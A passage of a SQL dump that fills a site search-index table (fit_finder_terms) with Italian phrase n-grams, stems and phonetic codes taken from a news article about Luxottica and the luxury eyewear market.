di',0,1,1.2333,'F230',1,'en'),(30523,'fatta','fatta',0,0,0.3333,'F300',1,'en'),(30524,'fatta di','fatta di',0,1,1.2667,'F300',1,'en'),(30525,'fatta di piccole','fatta di piccole',0,1,1.5333,'F3124',1,'en'),(30526,'fatto','fatto',0,0,0.3333,'F300',2,'en'),(30527,'fatto pertaining','fatto pertaining',0,1,1.5333,'F316352',1,'en'),(30528,'fatto pertaining to','fatto pertaining to',0,1,1.6333,'F3163523',1,'en'),(30529,'fatto sforzi','fatto sforzi',0,1,1.4,'F32162',1,'en'),(30530,'fatto sforzi doing','fatto sforzi doing',0,1,1.6,'F32162352',1,'en'),(30531,'fatturato','fatturato',0,0,0.6,'F363',1,'en'),(30532,'fatturato andata','fatturato andata',0,1,1.5333,'F36353',1,'en'),(30533,'fatturato andata meglio','fatturato andata meglio',0,1,1.7667,'F36353524',1,'en'),(30534,'fatturato il','fatturato il',0,1,1.4,'F3634',1,'en'),(30535,'fatturato il 65','fatturato il 65',0,1,1.5,'F3634',1,'en'),(30536,'firmati','firmati',0,0,0.4667,'F653',1,'en'),(30537,'firmati for','firmati for',0,1,1.3667,'F65316',1,'en'),(30538,'firmati for every','firmati for every',0,1,1.5667,'F6531616',1,'en'),(30539,'focus','focu',0,0,0.3333,'F200',2,'en'),(30540,'focus molto','focu molto',0,1,1.3667,'F2543',1,'en'),(30541,'focus molto attenti','focu molto attenti',0,1,1.6333,'F254353',1,'en'),(30542,'fondato','fondato',0,0,0.4667,'F530',1,'en'),(30543,'fondato da','fondato da',0,1,1.3333,'F530',1,'en'),(30544,'fondato da leonardo','fondato da leonardo',0,1,1.6333,'F534563',1,'en'),(30545,'for every attrarre','for every attrarre',0,1,1.6,'F61636',1,'en'),(30546,'for every esempio','for every esempio',0,1,1.5667,'F616251',1,'en'),(30547,'for every il','for every il',0,1,1.4,'F6164',1,'en'),(30548,'for imespec','for imespec',0,1,1.3667,'F65212',1,'en'),(30549,'for imespec each','for imespec each',0,1,1.5333,'F65212',1,'en'),(30550,'for lo','for lo',0,1,1.2,'F640',1,'en'),(30551,'for lo più','for lo più',0,1,1.3333,'F641',1,'en'),(30552,'forma','forma',0,0,0.3333,'F650',1,'en'),(30553,'forma dei','forma dei',0,1,1.3,'F653',1,'en'),(30554,'forma dei dati','forma dei dati',0,1,1.4667,'F653',1,'en'),(30555,'forma di','forma di',0,1,1.2667,'F653',1,'en'),(30556,'forma di riutilizzo','forma di riutilizzo',0,1,1.6333,'F6536342',1,'en'),(30557,'fornite','fornit',0,0,0.4667,'F653',1,'en'),(30558,'fornite da','fornit da',0,1,1.3333,'F653',1,'en'),(30559,'fornite da rcs','fornit da rcs',0,1,1.4667,'F65362',1,'en'),(30560,'fornitori','fornitori',0,0,0.6,'F6536',1,'en'),(30561,'fornitori locali','fornitori locali',0,1,1.5333,'F6536424',1,'en'),(30562,'fornitori locali scam','fornitori locali scam',0,1,1.7,'F653642425',1,'en'),(30563,'frequenti','frequenti',0,0,0.6,'F6253',1,'en'),(30564,'frequenti ma','frequenti ma',0,1,1.4,'F62535',1,'en'),(30565,'frequenti ma non','frequenti ma non',0,1,1.5333,'F62535',1,'en'),(30566,'gabbana','gabbana',0,0,0.4667,'G150',1,'en'),(30567,'gabbana erano','gabbana erano',0,1,1.4333,'G1565',1,'en'),(30568,'gabbana erano attesi','gabbana erano attesi',0,1,1.6667,'G156532',1,'en'),(30569,'gall','gall',0,0,0.2667,'G400',1,'en'),(30570,'gall of','gall of',0,1,1.2333,'G410',1,'en'),(30571,'gall of usustmy','gall of usustmy',0,1,1.5,'G41235',1,'en'),(30572,'generally sezione','gener sezione',0,1,1.5667,'G56425',1,'en'),(30573,'generally sezione archivi','gener sezione archivi',0,1,1.8333,'G56425621',1,'en'),(30574,'generally taglia','gener taglia',0,1,1.5333,'G564324',1,'en'),(30575,'generally taglia giusta','gener taglia giusta',0,1,1.7667,'G56432423',1,'en'),(30576,'genere dobbiamo','gener dobbiamo',0,1,1.5,'G56315',1,'en'),(30577,'genere dobbiamo averlo','gener dobbiamo averlo',0,1,1.7333,'G56315164',1,'en'),(30578,'genere la','gener la',0,1,1.3,'G564',1,'en'),(30579,'genere la cosa','gener la cosa',0,1,1.4667,'G5642',1,'en'),(30580,'geografica','geografica',0,0,0.6667,'G612',1,'en'),(30581,'geografica il','geografica il',0,1,1.4333,'G6124',1,'en'); INSERT INTO `fit_finder_terms` VALUES (30582,'geografica il +13','geografica il +13',0,1,1.5667,'G6124',1,'en'),(30583,'gestire','gestir',0,0,0.4667,'G360',1,'en'),(30584,'get older','get older',0,1,1.3,'G3436',1,'en'),(30585,'get older abbondantemente','get older abbondantemente',0,1,1.8333,'G34361535353',1,'en'),(30586,'già','già',0,0,0.2,'G000',1,'en'),(30587,'già dimostrata','già dimostrata',0,1,1.4667,'G352363',1,'en'),(30588,'già dimostrata di','già dimostrata di',0,1,1.5667,'G352363',1,'en'),(30589,'già nel','già nel',0,1,1.2333,'G540',1,'en'),(30590,'già nel biennio','già nel biennio',0,1,1.5,'G5415',1,'en'),(30591,'già oggi','già oggi',0,1,1.2667,'G000',1,'en'),(30592,'già oggi abbiamo','già oggi abbiamo',0,1,1.5333,'G150',1,'en'),(30593,'giorni','giorni',0,0,0.4,'G650',1,'en'),(30594,'giorni scorsi','giorni scorsi',0,1,1.4333,'G65262',1,'en'),(30595,'giorni scorsi abbiamo','giorni scorsi abbiamo',0,1,1.7,'G6526215',1,'en'),(30596,'giovani','giovani',0,0,0.4667,'G150',1,'en'),(30597,'giovani di','giovani di',0,1,1.3333,'G153',1,'en'),(30598,'giovani di continuare','giovani di continuare',0,1,1.7,'G15325356',1,'en'),(30599,'giro','giro',0,0,0.2667,'G600',1,'en'),(30600,'giro d\'','giro d',0,1,1.2333,'G630',1,'en'),(30601,'giro d\' affari','giro d affari',0,1,1.4667,'G6316',1,'en'),(30602,'giusta','giusta',0,0,0.4,'G300',1,'en'),(30603,'giusta di','giusta di',0,1,1.3,'G300',1,'en'),(30604,'giusta di luxottica','giusta di luxottica',0,1,1.6333,'G34232',1,'en'),(30605,'gli occhiali','gli occhiali',0,1,1.4,'G424',2,'en'),(30606,'gli occhiali ma','gli occhiali ma',0,1,1.5,'G4245',1,'en'),(30607,'globale','global',0,0,0.4667,'G414',1,'en'),(30608,'globale avere','global avere',0,1,1.4333,'G41416',1,'en'),(30609,'globale avere il','global avere il',0,1,1.5333,'G414164',1,'en'),(30610,'gna ci','gna ci',0,1,1.2,'G520',1,'en'),(30611,'gna ci sono','gna ci sono',0,1,1.3667,'G525',1,'en'),(30612,'gna conosciamo','gna conosciamo',0,1,1.4667,'G52525',1,'en'),(30613,'gna conosciamo che','gna conosciamo che',0,1,1.6,'G525252',1,'en'),(30614,'gna è','gna è',0,1,1.1667,'G500',1,'en'),(30615,'gna è cresciuta','gna è cresciuta',0,1,1.5,'G52623',1,'en'),(30616,'gna è fatta','gna è fatta',0,1,1.3667,'G513',1,'en'),(30617,'gna è più','gna è più',0,1,1.3,'G510',1,'en'),(30618,'gna esista','gna esista',0,1,1.3333,'G523',1,'en'),(30619,'gna esista un','gna esista un',0,1,1.4333,'G5235',1,'en'),(30620,'gna il','gna il',0,1,1.2,'G540',2,'en'),(30621,'gna il mercato','gna il mercato',0,1,1.4667,'G545623',1,'en'),(30622,'gna la','gna la',0,1,1.2,'G540',1,'en'),(30623,'gna la più','gna la più',0,1,1.3333,'G541',1,'en'),(30624,'gna le','gna le',0,1,1.2,'G540',1,'en'),(30625,'gna le imprese','gna le imprese',0,1,1.4667,'G545162',1,'en'),(30626,'gna significa','gna significa',0,1,1.4333,'G52512',1,'en'),(30627,'gna significa parliamo','gna significa parliamo',0,1,1.7333,'G525121645',1,'en'),(30628,'gna sono','gna sono',0,1,1.2667,'G525',1,'en'),(30629,'gna sono semplicità','gna sono semplicità',0,1,1.6333,'G525251423',1,'en'),(30630,'gna sta','gna sta',0,1,1.2333,'G523',1,'en'),(30631,'gna sta cambiando','gna sta cambiando',0,1,1.5667,'G52325153',1,'en'),(30632,'gna stiamo','gna stiamo',0,1,1.3333,'G5235',1,'en'),(30633,'gna stiamo puntando','gna stiamo puntando',0,1,1.6333,'G523515353',1,'en'),(30634,'gna un','gna un',0,1,1.2,'G500',1,'en'),(30635,'gna un traguardo','gna un traguardo',0,1,1.5333,'G536263',1,'en'),(30636,'gna vogliamo','gna vogliamo',0,1,1.4,'G51245',1,'en'),(30637,'gna vuole','gna vuole',0,1,1.3,'G514',1,'en'),(30638,'gna vuole sganciare','gna vuole sganciare',0,1,1.6333,'G5142526',1,'en'),(30639,'grande','grand',0,0,0.4,'G653',1,'en'),(30640,'grande al','grand al',0,1,1.3,'G6534',1,'en'),(30641,'grande al mondo','grand al mondo',0,1,1.5,'G653453',1,'en'),(30642,'grande for','grand for',0,1,1.3333,'G65316',1,'en'),(30643,'grande for every','grand for every',0,1,1.5333,'G6531616',1,'en'),(30644,'grande lavoro','grand lavoro',0,1,1.4333,'G653416',1,'en'),(30645,'grande lavoro sull\'','grand lavoro sull',0,1,1.6333,'G65341624',1,'en'),(30646,'grande lezione','grand lezione',0,1,1.4667,'G653425',1,'en'),(30647,'grande lezione di','grand lezione di',0,1,1.5667,'G6534253',1,'en'),(30648,'grande marchio','grand marchio',0,1,1.4667,'G653562',1,'en'),(30649,'grande marchio brasiliano','grand marchio brasiliano',0,1,1.8333,'G65356216245',1,'en'),(30650,'grande marchio cinese','grand marchio cinese',0,1,1.7,'G65356252',1,'en'),(30651,'grandi','grandi',0,0,0.4,'G653',1,'en'),(30652,'grandi acquisizioni','grandi acquisizioni',0,1,1.6333,'G65325',1,'en'),(30653,'grandi acquisizioni abbiamo','grandi acquisizioni abbiamo',0,1,1.9,'G6532515',1,'en'),(30654,'grandi investimenti','grandi investimenti',0,1,1.6333,'G653512353',1,'en'),(30655,'grandi investimenti più','grandi investimenti più',0,1,1.7667,'G6535123531',1,'en'),(30656,'grandi qual','grandi qual',0,1,1.3667,'G65324',1,'en'),(30657,'grandi qual è','grandi qual è',0,1,1.4333,'G65324',1,'en'),(30658,'grandissimi','grandissimi',0,0,0.7333,'G65325',1,'en'),(30659,'grandissimi spazi','grandissimi spazi',0,1,1.5667,'G65325212',1,'en'),(30660,'grandissimi spazi di','grandissimi spazi di',0,1,1.6667,'G653252123',1,'en'),(30661,'grazie','grazi',0,0,0.4,'G620',1,'en'),(30662,'grazie all\'','grazi all',0,1,1.3667,'G624',1,'en'),(30663,'grazie all\' innovazione','grazi all innovazione',0,1,1.7667,'G6245125',1,'en'),(30664,'gruppo','gruppo',0,0,0.4,'G610',1,'en'),(30665,'gruppo è','gruppo è',0,1,1.2667,'G610',1,'en'),(30666,'gruppo è in','gruppo è in',0,1,1.3667,'G615',1,'en'),(30667,'gruppo fondato','gruppo fondato',0,1,1.4667,'G6153',1,'en'),(30668,'gruppo fondato da','gruppo fondato da',0,1,1.5667,'G6153',1,'en'),(30669,'gruppo gna','gruppo gna',0,1,1.3333,'G6125',1,'en'),(30670,'gruppo gna sono','gruppo gna sono',0,1,1.5,'G612525',1,'en'),(30671,'guardare','guardar',0,0,0.5333,'G636',1,'en'),(30672,'guardare paesi','guardar paesi',0,1,1.4667,'G63612',1,'en'),(30673,'guardare paesi travel','guardar paesi travel',0,1,1.7,'G636123614',1,'en'),(30674,'guerra','guerra',0,0,0.4,'G600',1,'en'),(30675,'guerra da','guerra da',0,1,1.3,'G630',1,'en'),(30676,'guerra da tre','guerra da tre',0,1,1.4333,'G636',1,'en'),(30677,'ha detto','ha detto',0,1,1.2667,'H300',1,'en'),(30678,'ha detto che','ha detto che',0,1,1.4,'H320',1,'en'),(30679,'ha detto gna','ha detto gna',0,1,1.4,'H325',1,'en'),(30680,'ha la','ha la',0,1,1.1667,'H400',1,'en'),(30681,'ha la possibilità','ha la possibilità',0,1,1.5667,'H412143',1,'en'),(30682,'ha preannunciato','ha preannunciato',0,1,1.5333,'H16523',1,'en'),(30683,'ha preannunciato prossime','ha preannunciato prossime',0,1,1.8333,'H165231625',1,'en'),(30684,'hanno','hanno',0,0,0.3333,'H500',1,'en'),(30685,'hanno un','hanno un',0,1,1.2667,'H500',1,'en'),(30686,'hanno un prezzo','hanno un prezzo',0,1,1.5,'H5162',1,'en'),(30687,'i 5','i 5',0,1,1.1,'I000',1,'en'),(30688,'i 5 miliardi','i 5 miliardi',0,1,1.4,'I5463',1,'en'),(30689,'i fornitori','i fornitori',0,1,1.3667,'I16536',1,'en'),(30690,'i fornitori locali','i fornitori locali',0,1,1.6,'I16536424',1,'en'),(30691,'i messaggi','i messaggi',0,1,1.3333,'I520',1,'en'),(30692,'i messaggi noi','i messaggi noi',0,1,1.4667,'I525',1,'en'),(30693,'i permessi','i permessi',0,1,1.3333,'I1652',1,'en'),(30694,'i permessi the','i permessi the',0,1,1.4667,'I16523',1,'en'),(30695,'i quatst\'','i quatst',0,1,1.3,'I2323',1,'en'),(30696,'i quatst\' anno','i quatst anno',0,1,1.4667,'I23235',1,'en'),(30697,'i quatsto','i quatsto',0,1,1.3,'I2323',1,'en'),(30698,'i quatsto è','i quatsto è',0,1,1.3667,'I2323',1,'en'),(30699,'i valori','i valori',0,1,1.2667,'I146',1,'en'),(30700,'i valori del','i valori del',0,1,1.4,'I14634',1,'en'),(30701,'il +13','il +13',0,1,1.2,'I400',1,'en'),(30702,'il +13 delete','il +13 delete',0,1,1.4333,'I4343',1,'en'),(30703,'il 65','il 65',0,1,1.1667,'I400',1,'en'),(30704,'il 65 delete','il 65 delete',0,1,1.4,'I4343',1,'en'),(30705,'il 90','il 90',0,1,1.1667,'I400',1,'en'),(30706,'il 90 mercato','il 90 mercato',0,1,1.4333,'I45623',1,'en'),(30707,'il consuntivo','il consuntivo',0,1,1.4333,'I4252531',1,'en'),(30708,'il consuntivo delete','il consuntivo delete',0,1,1.6667,'I4252531343',1,'en'),(30709,'il lusso','il lusso',0,1,1.2667,'I420',1,'en'),(30710,'il lusso oggi','il lusso oggi',0,1,1.4333,'I420',1,'en'),(30711,'il lusso questo','il lusso questo',0,1,1.5,'I423',1,'en'),(30712,'il meglio','il meglio',0,1,1.3,'I4524',1,'en'),(30713,'il meglio degli','il meglio degli',0,1,1.5,'I4524324',1,'en'),(30714,'il mercato','il mercato',0,1,1.3333,'I45623',1,'en'),(30715,'il mercato più','il mercato più',0,1,1.4667,'I456231',1,'en'),(30716,'il mercato sia','il mercato sia',0,1,1.4667,'I456232',1,'en'),(30717,'il nostro','il nostro',0,1,1.3,'I45236',1,'en'),(30718,'il nostro consumatore','il nostro consumatore',0,1,1.7,'I45236252536',1,'en'),(30719,'il passo','il passo',0,1,1.2667,'I412',1,'en'),(30720,'il passo successivo','il passo successivo',0,1,1.6333,'I4121',1,'en'),(30721,'il portafoglio','il portafoglio',0,1,1.4667,'I4163124',1,'en'),(30722,'il portafoglio e','il portafoglio e',0,1,1.5333,'I4163124',1,'en'),(30723,'il servizio','il servizio',0,1,1.3667,'I42612',1,'en'),(30724,'il servizio deve','il servizio deve',0,1,1.5333,'I4261231',1,'en'),(30725,'il settore','il settore',0,1,1.3333,'I4236',1,'en'),(30726,'il settore e','il settore e',0,1,1.4,'I4236',1,'en'),(30727,'il suo','il suo',0,1,1.2,'I420',1,'en'),(30728,'il suo dna','il suo dna',0,1,1.3333,'I4235',1,'en'),(30729,'il suo mestiere','il suo mestiere',0,1,1.5,'I425236',1,'en'),(30730,'il tasso','il tasso',0,1,1.2667,'I432',1,'en'),(30731,'il tasso di','il tasso di',0,1,1.3667,'I4323',1,'en'),(30732,'il tipo','il tipo',0,1,1.2333,'I431',1,'en'),(30733,'il tipo di','il tipo di',0,1,1.3333,'I4313',1,'en'),(30734,'il traguardo','il traguardo',0,1,1.4,'I436263',1,'en'),(30735,'il traguardo dei','il traguardo dei',0,1,1.5333,'I436263',1,'en'),(30736,'il vostro','il vostro',0,1,1.3,'I41236',1,'en'),(30737,'il vostro marchio','il vostro marchio',0,1,1.5667,'I41236562',1,'en'),(30738,'imespec','imespec',0,0,0.4667,'I5212',1,'en'),(30739,'imespec each','imespec each',0,1,1.4,'I5212',1,'en'),(30740,'imespec each and','imespec each and',0,1,1.5333,'I521253',1,'en'),(30741,'immaginare','immaginar',0,0,0.6667,'I5256',1,'en'),(30742,'immaginare una','immaginar una',0,1,1.4667,'I52565',1,'en'),(30743,'immaginare una crescita','immaginar una crescita',0,1,1.7667,'I525652623',1,'en'),(30744,'importante','important',0,0,0.6667,'I516353',1,'en'),(30745,'importante e','important e',0,1,1.4,'I516353',1,'en'),(30746,'importante e questo','important e questo',0,1,1.6333,'I51635323',1,'en'),(30747,'importante sia','important sia',0,1,1.4667,'I5163532',1,'en'),(30748,'importante sia quella','important sia quella',0,1,1.7,'I51635324',1,'en'),(30749,'imprese','impres',0,0,0.4667,'I5162',1,'en'),(30750,'imprese agili','impres agili',0,1,1.4333,'I51624',1,'en'),(30751,'imprese agili e','impres agili e',0,1,1.5,'I51624',1,'en'),(30752,'imprese devono','impres devono',0,1,1.4667,'I5162315',1,'en'),(30753,'imprese devono essere','impres devono essere',0,1,1.7,'I516231526',1,'en'),(30754,'in assoluto','in assoluto',0,1,1.3667,'I5243',1,'en'),(30755,'in assoluto grande','in assoluto grande',0,1,1.6,'I52432653',1,'en'),(30756,'in cina','in cina',0,1,1.2333,'I525',1,'en'),(30757,'in cina con','in cina con',0,1,1.3667,'I52525',1,'en'),(30758,'in cina quell\'','in cina quell',0,1,1.4667,'I52524',1,'en'),(30759,'in dollari','in dollari',0,1,1.3333,'I5346',1,'en'),(30760,'in dollari e','in dollari e',0,1,1.4,'I5346',1,'en'),(30761,'in fase','in fase',0,1,1.2333,'I512',1,'en'),(30762,'in fase di','in fase di',0,1,1.3333,'I5123',1,'en'),(30763,'in mente','in mente',0,1,1.2667,'I530',1,'en'),(30764,'in mente alcuna','in mente alcuna',0,1,1.5,'I53425',1,'en'),(30765,'in mente low','in mente low',0,1,1.4,'I534',1,'en'),(30766,'in of','in of',0,1,1.1667,'I510',1,'en'),(30767,'in of asia','in of asia',0,1,1.3333,'I512',1,'en'),(30768,'in prima','in prima',0,1,1.2667,'I5165',1,'en'),(30769,'in prima linea','in prima linea',0,1,1.4667,'I516545',1,'en'),(30770,'in sette','in sette',0,1,1.2667,'I523',1,'en'),(30771,'in sette otto','in sette otto',0,1,1.4333,'I523',1,'en'),(30772,'in testa','in testa',0,1,1.2667,'I5323',1,'en'),(30773,'in testa le','in testa le',0,1,1.3667,'I53234',1,'en'),(30774,'in tiongkok','in tiongkok',0,1,1.3667,'I5352',1,'en'),(30775,'in tiongkok abbiamo','in tiongkok abbiamo',0,1,1.6333,'I535215',1,'en'),(30776,'in tutte','in tutte',0,1,1.2667,'I530',2,'en'),(30777,'in tutte le','in tutte le',0,1,1.3667,'I534',1,'en'),(30778,'in using','in using',0,1,1.2667,'I5252',1,'en'),(30779,'in using a','in using a',0,1,1.3333,'I5252',1,'en'),(30780,'includere','includer',0,0,0.6,'I52436',1,'en'),(30781,'includere culture','includer culture',0,1,1.5667,'I524362436',1,'en'),(30782,'includere culture ed','includer culture ed',0,1,1.6667,'I5243624363',1,'en'),(30783,'incubo','incubo',0,0,0.4,'I521',1,'en'),(30784,'incubo poi','incubo poi',0,1,1.3333,'I521',1,'en'),(30785,'incubo poi be','incubo poi be',0,1,1.4333,'I521',1,'en'),(30786,'india','india',0,0,0.3333,'I530',1,'en'),(30787,'india società','india società',0,1,1.4333,'I5323',1,'en'),(30788,'india società gna','india società gna',0,1,1.5667,'I532325',1,'en'),(30789,'indiano','indiano',0,0,0.4667,'I535',1,'en'),(30790,'indiano stento','indiano stento',0,1,1.4667,'I5352353',1,'en'),(30791,'indiano stento invece','indiano stento invece',0,1,1.7,'I5352353512',1,'en'),(30792,'inferiore','inferior',0,0,0.6,'I516',1,'en'),(30793,'inferiore ai','inferior ai',0,1,1.4,'I516',1,'en'),(30794,'inferiore ai 30','inferior ai 30',0,1,1.5,'I516',1,'en'),(30795,'influisce','influisc',0,0,0.6,'I5142',1,'en'),(30796,'influisce molto','influisc molto',0,1,1.5,'I5142543',1,'en'),(30797,'influisce molto risponde','influisc molto risponde',0,1,1.8,'I514254362153',1,'en'),(30798,'informazioni','informazioni',0,0,0.8,'I516525',1,'en'),(30799,'informazioni fornite','informazioni fornite',0,1,1.6667,'I5165251653',1,'en'),(30800,'informazioni fornite da','informazioni fornite da',0,1,1.7667,'I5165251653',1,'en'),(30801,'ingl\'','ingl',0,0,0.3333,'I524',1,'en'),(30802,'ingl\' inizio','ingl inizio',0,1,1.4,'I52452',1,'en'),(30803,'ingl\' inizio dell\'','ingl inizio dell',0,1,1.6,'I5245234',1,'en'),(30804,'iniziativa','iniziativa',0,0,0.6667,'I5231',1,'en'),(30805,'iniziativa privata','iniziativa privata',0,1,1.6,'I5231613',1,'en'),(30806,'iniziativa privata che','iniziativa privata che',0,1,1.7333,'I52316132',1,'en'),(30807,'inizio','inizio',0,0,0.4,'I520',1,'en'),(30808,'inizio dell\'','inizio dell',0,1,1.4,'I5234',1,'en'),(30809,'inizio dell\' anno','inizio dell anno',0,1,1.5667,'I52345',1,'en'),(30810,'innovazione','innovazion',0,0,0.7333,'I5125',1,'en'),(30811,'innovazione dei','innovazion dei',0,1,1.5,'I51253',1,'en'),(30812,'innovazione dei punti','innovazion dei punti',0,1,1.7,'I51253153',1,'en'),(30813,'intanto','intanto',0,0,0.4667,'I5353',1,'en'),(30814,'intanto nei','intanto nei',0,1,1.3667,'I53535',1,'en'),(30815,'intanto nei giorni','intanto nei giorni',0,1,1.6,'I53535265',1,'en'),(30816,'integrare','integrar',0,0,0.6,'I5326',1,'en'),(30817,'integrare le','integrar le',0,1,1.4,'I53264',1,'en'),(30818,'integrare le diversità','integrar le diversità',0,1,1.7333,'I5326431623',1,'en'),(30819,'intendesse','intendess',0,0,0.6667,'I53532',1,'en'),(30820,'intendesse utilizzare','intendess utilizzare',0,1,1.7,'I535323426',1,'en'),(30821,'intendesse utilizzare il','intendess utilizzare il',0,1,1.8,'I5353234264',1,'en'),(30822,'interne','intern',0,0,0.4667,'I5365',2,'en'),(30823,'interne alla','intern alla',0,1,1.4,'I53654',1,'en'),(30824,'interne alla propria','intern alla propria',0,1,1.6667,'I536541616',1,'en'),(30825,'invece','invec',0,0,0.4,'I512',1,'en'),(30826,'invece a','invec a',0,1,1.2667,'I512',1,'en'),(30827,'invece a vedere','invec a vedere',0,1,1.5,'I512136',1,'en'),(30828,'investimenti','investimenti',0,0,0.8,'I512353',1,'en'),(30829,'investimenti più','investimenti più',0,1,1.5333,'I5123531',1,'en'),(30830,'investimenti più volte','investimenti più volte',0,1,1.7333,'I512353143',1,'en'),(30831,'italia luxottica','italia luxottica',0,1,1.5333,'I34232',1,'en'),(30832,'italia luxottica obiettivo','italia luxottica obiettivo',0,1,1.8667,'I34232131',1,'en'),(30833,'italiana','italiana',0,0,0.5333,'I345',1,'en'),(30834,'italiana gna','italiana gna',0,1,1.4,'I34525',1,'en'),(30835,'italiana gna è','italiana gna è',0,1,1.4667,'I34525',1,'en'),(30836,'l\'','l',0,0,0.1333,'L000',1,'en'),(30837,'l\' 85','l 85',0,1,1.1667,'L000',1,'en'),(30838,'l\' 85 degli','l 85 degli',0,1,1.3667,'L324',1,'en'),(30839,'l\' accordo','l accordo',0,1,1.3333,'L263',1,'en'),(30840,'l\' accordo minus','l accordo minus',0,1,1.5333,'L26352',1,'en'),(30841,'l\' altra','l altra',0,1,1.2667,'L360',1,'en'),(30842,'l\' altra sfida','l altra sfida',0,1,1.4667,'L36213',1,'en'),(30843,'l\' anno','l anno',0,1,1.2333,'L500',1,'en'),(30844,'l\' anno scorso','l anno scorso',0,1,1.4667,'L5262',1,'en'),(30845,'la cina','la cina',0,1,1.2333,'L250',1,'en'),(30846,'la cina è','la cina è',0,1,1.3,'L250',1,'en'),(30847,'la congiuntura','la congiuntura',0,1,1.4667,'L252536',1,'en'),(30848,'la congiuntura pertaining','la congiuntura pertaining',0,1,1.8333,'L25253616352',1,'en'),(30849,'la cosa','la cosa',0,1,1.2333,'L200',1,'en'),(30850,'la cosa da','la cosa da',0,1,1.3333,'L230',1,'en'),(30851,'la cosa positiva','la cosa positiva',0,1,1.5333,'L21231',1,'en'),(30852,'la grande','la grande',0,1,1.3,'L2653',1,'en'),(30853,'la grande lezione','la grande lezione',0,1,1.5667,'L2653425',1,'en'),(30854,'la moda','la moda',0,1,1.2333,'L530',1,'en'),(30855,'la moda e','la moda e',0,1,1.3,'L530',1,'en'),(30856,'la più','la più',0,1,1.2,'L100',1,'en'),(30857,'la più importante','la più importante',0,1,1.5667,'L1516353',1,'en'),(30858,'la possibilità','la possibilità',0,1,1.4667,'L12143',1,'en'),(30859,'la possibilità di','la possibilità di',0,1,1.5667,'L12143',1,'en'),(30860,'la primother','la primother',0,1,1.4,'L16536',1,'en'),(30861,'la primother la','la primother la',0,1,1.5,'L165364',1,'en'),(30862,'la riproduzione','la riproduzione',0,1,1.5,'L616325',1,'en'),(30863,'la riproduzione anche','la riproduzione anche',0,1,1.7,'L6163252',1,'en'),(30864,'la rivendita','la rivendita',0,1,1.4,'L6153',1,'en'),(30865,'la rivendita e','la rivendita e',0,1,1.4667,'L6153',1,'en'),(30866,'la romania','la romania',0,1,1.3333,'L650',1,'en'),(30867,'la romania chicago','la romania chicago',0,1,1.6,'L652',1,'en'),(30868,'la sfida','la sfida',0,1,1.2667,'L213',1,'en'),(30869,'la sfida più','la sfida più',0,1,1.4,'L2131',1,'en'),(30870,'la struttura','la struttura',0,1,1.4,'L23636',1,'en'),(30871,'la struttura delle','la struttura delle',0,1,1.6,'L2363634',1,'en'),(30872,'la tiongkok','la tiongkok',0,1,1.3667,'L352',1,'en'),(30873,'la tiongkok è','la tiongkok è',0,1,1.4333,'L352',1,'en'),(30874,'lanciando','lanciando',0,0,0.6,'L5253',1,'en'),(30875,'lanciando polo','lanciando polo',0,1,1.4667,'L525314',1,'en'),(30876,'lanciando polo ralph','lanciando polo ralph',0,1,1.6667,'L525314641',1,'en'),(30877,'lanciato','lanciato',0,0,0.5333,'L523',1,'en'),(30878,'lanciato un\'','lanciato un',0,1,1.4,'L5235',1,'en'),(30879,'lanciato un\' offerta','lanciato un offerta',0,1,1.6667,'L5235163',1,'en'),(30880,'lancio','lancio',0,0,0.4,'L520',1,'en'),(30881,'lancio di','lancio di',0,1,1.3,'L523',1,'en'),(30882,'lancio di united','lancio di united',0,1,1.5333,'L52353',1,'en'),(30883,'lancio scam','lancio scam',0,1,1.3667,'L525',1,'en'),(30884,'lancio scam burberry','lancio scam burberry',0,1,1.6667,'L5251616',1,'en'),(30885,'lauren italia','lauren italia',0,1,1.4333,'L6534',4,'en'),(30886,'lauren italia luxottica','lauren italia luxottica',0,1,1.7667,'L6534232',1,'en'),(30887,'lauren siamo','lauren siamo',0,1,1.4,'L6525',1,'en'),(30888,'lauren siamo in','lauren siamo in',0,1,1.5,'L6525',1,'en'),(30889,'lavorare','lavorar',0,0,0.5333,'L160',1,'en'),(30890,'lavorare in','lavorar in',0,1,1.3667,'L165',1,'en'),(30891,'lavorare in tutte','lavorar in tutte',0,1,1.5667,'L1653',1,'en'),(30892,'lavoro','lavoro',0,0,0.4,'L160',1,'en'),(30893,'lavoro cosa','lavoro cosa',0,1,1.3667,'L162',1,'en'),(30894,'lavoro cosa gna','lavoro cosa gna',0,1,1.5,'L1625',1,'en'),(30895,'lavoro lunited','lavoro lunited',0,1,1.4667,'L16453',1,'en'),(30896,'lavoro lunited nationsgo','lavoro lunited nationsgo',0,1,1.8,'L164535352',1,'en'),(30897,'lavoro sull\'','lavoro sull',0,1,1.4,'L1624',1,'en'),(30898,'lavoro sull\' organizzazione','lavoro sull organizzazione',0,1,1.9,'L162462525',1,'en'),(30899,'le diversità','le diversità',0,1,1.4,'L31623',1,'en'),(30900,'le diversità e','le diversità e',0,1,1.4667,'L31623',1,'en'),(30901,'le imprese','le imprese',0,1,1.3333,'L5162',1,'en'),(30902,'le imprese devono','le imprese devono',0,1,1.5667,'L5162315',1,'en'),(30903,'le linee','le linee',0,1,1.2667,'L500',1,'en'),(30904,'le linee più','le linee più',0,1,1.4,'L510',1,'en'),(30905,'le parti','le parti',0,1,1.2667,'L163',1,'en'),(30906,'le parti delete','le parti delete',0,1,1.5,'L16343',1,'en'),(30907,'legato','legato',0,0,0.4,'L230',1,'en'),(30908,'legato al','legato al',0,1,1.3,'L234',1,'en'),(30909,'legato al easy','legato al easy',0,1,1.4667,'L2342',1,'en'),(30910,'legge','legg',0,0,0.3333,'L200',1,'en'),(30911,'legge sulle','legg sulle',0,1,1.3667,'L240',1,'en'),(30912,'legge sulle informazioni','legg sulle informazioni',0,1,1.8,'L24516525',1,'en'),(30913,'lei','lei',0,0,0.2,'L000',1,'en'),(30914,'lei ha','lei ha',0,1,1.2,'L000',1,'en'),(30915,'lei ha detto','lei ha detto',0,1,1.4,'L300',1,'en'),(30916,'lei sostiene','lei sostiene',0,1,1.4,'L235',1,'en'),(30917,'lei sostiene gna','lei sostiene gna',0,1,1.5333,'L23525',1,'en'),(30918,'lento','lento',0,0,0.3333,'L530',1,'en'),(30919,'lento nello','lento nello',0,1,1.3667,'L5354',1,'en'),(30920,'lento nello scoprire','lento nello scoprire',0,1,1.6667,'L5354216',1,'en'),(30921,'leonardo','leonardo',0,0,0.5333,'L563',1,'en'),(30922,'leonardo del','leonardo del',0,1,1.4,'L5634',1,'en'),(30923,'leonardo del vecchio','leonardo del vecchio',0,1,1.6667,'L563412',1,'en'),(30924,'leonardo delete','leonardo delete',0,1,1.5,'L56343',1,'en'),(30925,'leonardo delete vecchio','leonardo delete 